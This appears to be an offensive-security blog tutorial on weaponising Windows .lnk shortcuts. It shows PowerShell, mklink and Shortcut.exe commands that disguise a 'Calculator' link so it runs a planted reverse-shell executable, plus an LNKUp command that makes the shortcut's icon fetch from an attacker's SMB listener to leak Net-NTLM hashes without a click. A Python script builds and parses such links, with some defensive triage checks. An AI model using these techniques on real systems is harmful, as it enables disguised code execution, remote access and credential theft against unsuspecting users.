.lnk Command Execution

In this post we'll be covering the different ways we can create, edit, and abuse Windows .lnk files to achieve command execution.

.lnk files are Windows shell shortcuts (shell links): small binary files that point to a program, document or folder and that also store command-line arguments, a working directory, a window style and an icon location. Explorer launches whatever the link says, not whatever its file name or icon suggests, which is what makes them useful to an attacker.

PowerShell


The following commands will create a .lnk file to the Windows Calculator program located at c:\Windows\System32\calc.exe

$WScript = New-Object -COM WScript.Shell
$SC = $WScript.CreateShortcut('C:\Users\New\Desktop\Calculator.lnk')
$SC.TargetPath = "C:\Windows\System32\calc.exe"

$SC             # check everything is correct before saving

FullName         : C:\Users\New\Desktop\Calculator.lnk
Arguments        :
Description      :
Hotkey           :
IconLocation     : ,0
RelativePath     :
TargetPath       : C:\Windows\System32\calc.exe
WindowStyle      : 1
WorkingDirectory :

$SC.Save()      # nothing is written to disk until Save() is called

Double clicking the link launches the calculator, shown below:


We want to hijack the execution path so that when the link is clicked it runs a program of our choosing, instead of c:\windows\system32\calc.exe.

Right-click the link and select properties, the following window will pop up:


Change the Target: and Start in: fields to the following. The Target: field is the shortcut's TargetPath followed by its Arguments, so everything after the first executable is passed to it as arguments:

Target: C:\Windows\System32\cmd.exe /c C:\Windows\System32\cmd.exe
Start in: C:\Windows\System32


Click Apply, then OK to save the changes.

Our Calculator.lnk file will now launch cmd.exe instead of calc.exe, with the same privileges as the user that clicked upon it. You’ll see that when we now click on the link, a command prompt is spawned instead of the calculator:


So we control what the victim executes on click. The only limit is the privilege of the account that clicks: the link runs as that user and nothing about it elevates, so a low-privileged victim gives us a low-privileged session.

Our best bet is therefore to execute an exe or ps1 reverse shell.

$WScript = New-Object -COM WScript.Shell
# Use a full path: the COM object resolves relative paths against the process working directory, which need not match $PWD.
$SC = $WScript.CreateShortcut("$PWD\Calculator.lnk")
$SC.TargetPath = "C:\Windows\System32\cmd.exe"
$SC.Arguments = "/c C:\programdata\shell.exe"
$SC          # check everything is correct
$SC.Save()

When the link is clicked, cmd.exe runs whatever is in $SC.Arguments on the target host, so be sure your shell is already in place at C:\programdata\shell.exe (or another location the victim user can write to and execute from).
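
The same shortcut can be produced and inspected without Windows at all. The script below is an added example, not code from the original post: it writes the shell link that the $SC commands above create (target cmd.exe, arguments /c C:\programdata\shell.exe, working directory, a borrowed calc.exe icon, minimised window) by following the MS-SHLLINK layout directly, then parses the bytes back so you can see exactly what sits on disk. build_lnk, parse_lnk and suspicious are names chosen here; the suspicious() heuristics are the defender's view of this hijack and are illustrative, not a detection rule. It is assumed that Windows resolves the target from the LinkInfo block alone (no LinkTargetIDList is written), so test the output on a real host before relying on it.

```python
import struct
import uuid
from dataclasses import dataclass

# LinkFlags bits from the MS-SHLLINK header (only the ones used here).
HAS_LINK_TARGET_IDLIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # ShowCommand: 1 = normal window, 7 = start minimised
INTERPRETERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe")


def _string_data(s):
    """StringData item: UTF-16LE character count, then the characters, no terminator."""
    enc = s.encode("utf-16-le")
    return struct.pack("<H", len(enc) // 2) + enc


def _link_info(local_base_path):
    """Minimal LinkInfo: a VolumeID with an empty label plus an ANSI LocalBasePath."""
    base = local_base_path.encode("ascii") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # size, DRIVE_FIXED, serial, label offset, ""
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(base)
    header = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 1, 0x1C, base_off, 0, suffix_off)
    return header + volume_id + base + b"\x00"  # trailing byte is the empty CommonPathSuffix


def build_lnk(target, arguments="", working_dir="", icon="", show=SW_SHOWNORMAL):
    """Serialise a shell link equivalent to what WScript.Shell.CreateShortcut writes.
    Assumption: Windows resolves the target from LinkInfo alone, so no LinkTargetIDList is emitted."""
    flags = HAS_LINK_INFO | IS_UNICODE
    strings = b""
    for bit, value in ((HAS_WORKING_DIR, working_dir), (HAS_ARGUMENTS, arguments), (HAS_ICON_LOCATION, icon)):
        if value:                       # StringData items must appear in this fixed order
            flags |= bit
            strings += _string_data(value)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show, 0, 0, 0, 0)
    return header + _link_info(target) + strings + struct.pack("<I", 0)  # zero-length TerminalBlock


@dataclass
class Lnk:
    target: str
    working_dir: str
    arguments: str
    icon: str
    show_command: int


def parse_lnk(data):
    """Recover target, working directory, arguments, icon and window style from a .lnk blob."""
    if data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:               # skip IDListSize plus the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        size, _, info_flags = struct.unpack_from("<III", data, pos)
        if info_flags & 1:                           # VolumeIDAndLocalBasePath
            base_off = struct.unpack_from("<I", data, pos + 0x10)[0]
            target = data[pos + base_off:data.index(b"\x00", pos + base_off)].decode("cp1252", "replace")
        pos += size
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon")):
        if not flags & bit:
            fields[name] = ""
            continue
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        fields[name] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += n * width
    return Lnk(target, fields["working_dir"], fields["arguments"], fields["icon"], show)


def suspicious(link):
    """Illustrative triage heuristics for this hijack: interpreter target, arguments, minimised window, odd icon."""
    reasons = []
    if link.target.lower().endswith(INTERPRETERS):
        reasons.append("target is a command/script interpreter: " + link.target)
        if link.arguments:
            reasons.append("interpreter is launched with arguments: " + link.arguments)
    if link.show_command == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimised, hiding the console")
    icon = link.icon.lower()
    if icon.startswith("\\\\"):
        reasons.append("icon is fetched from a UNC path, which forces an SMB authentication: " + link.icon)
    elif icon.endswith(".exe") and icon != link.target.lower():
        reasons.append("icon borrowed from a different executable than the target: " + link.icon)
    return reasons


if __name__ == "__main__":
    # Same shortcut the page builds with $SC.TargetPath / $SC.Arguments, dressed up to look like Calculator.
    blob = build_lnk(r"C:\Windows\System32\cmd.exe", arguments=r"/c C:\programdata\shell.exe",
                     working_dir=r"C:\Windows\System32", icon=r"C:\Windows\System32\calc.exe",
                     show=SW_SHOWMINNOACTIVE)
    with open("Calculator.lnk", "wb") as f:
        f.write(blob)
    link = parse_lnk(blob)
    print(link)
    for reason in suspicious(link):
        print(" -", reason)
```

Running the script writes Calculator.lnk into the current directory and prints the parsed fields. parse_lnk() also works on shortcuts pulled from a phishing sample or a user's desktop (parse_lnk(open(path, "rb").read())), which is a quicker check than opening the properties dialog, and shows why the icon and file name tell you nothing about what the link actually runs.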


PowerShell One-Liner


The following command can also be used to produce a Calculator.lnk that launches a program of our choosing. Unlike the WScript.Shell method, this creates an NTFS symbolic link rather than a shell link: the file carries no target, arguments or icon of its own and simply resolves to cmd.exe.

New-Item -ItemType SymbolicLink -Path C:\users\new\desktop\ -Name Calculator.lnk -Value C:\Windows\System32\cmd.exe

Creating symbolic links requires SeCreateSymbolicLinkPrivilege, which only administrators hold by default (non-administrators get it on Windows 10 with Developer Mode enabled), so start PowerShell as admin on your local machine, then use the properties method mentioned earlier to change the target executable to that of your choosing.

mklink


The mklink utility simply creates a symbolic link between two objects:

mklink Calculator.lnk C:\windows\System32\cmd.exe

As with New-Item, this needs the symbolic-link privilege, so run it from a command prompt started as admin on your local machine, then use the properties method mentioned earlier to change the target executable to that of your choosing.

Shortcut.exe


The Shortcut.exe utility is available on Windows 7, but not on Windows 10. It can still be used to create a Calculator link to a malicious exe uploaded on the victim host:

shortcut.exe /F:Calculator.lnk /A:C /T:C:\programdata\shell.exe

/F:filename	: Specifies the .LNK shortcut file.
/A:action	: Defines the action to take (C=Create, E=Edit or Q=Query).
/T:target	: Defines the target path and file name the shortcut points to.


LNKUp


Finally there's a tool called LNKUp that automates the process for us. --execute sets the command run when the link is clicked; --type ntlm additionally points the icon at a UNC path on --host, so merely rendering the shortcut in Explorer makes the victim's machine authenticate to our SMB listener and leak a Net-NTLM hash, without any click at all (--type environment exfiltrates environment variables instead):

python generate.py --host localhost --type ntlm --output Calculator.lnk --execute 'C:\programdata\shell.exe'

Simply upload the generated Calculator.lnk file, keep the listener on --host running, and wait for its execution.


Conclusion


I used the Windows Calculator for the sake of example. Be sure to tailor your .lnk file for the specific situation at hand.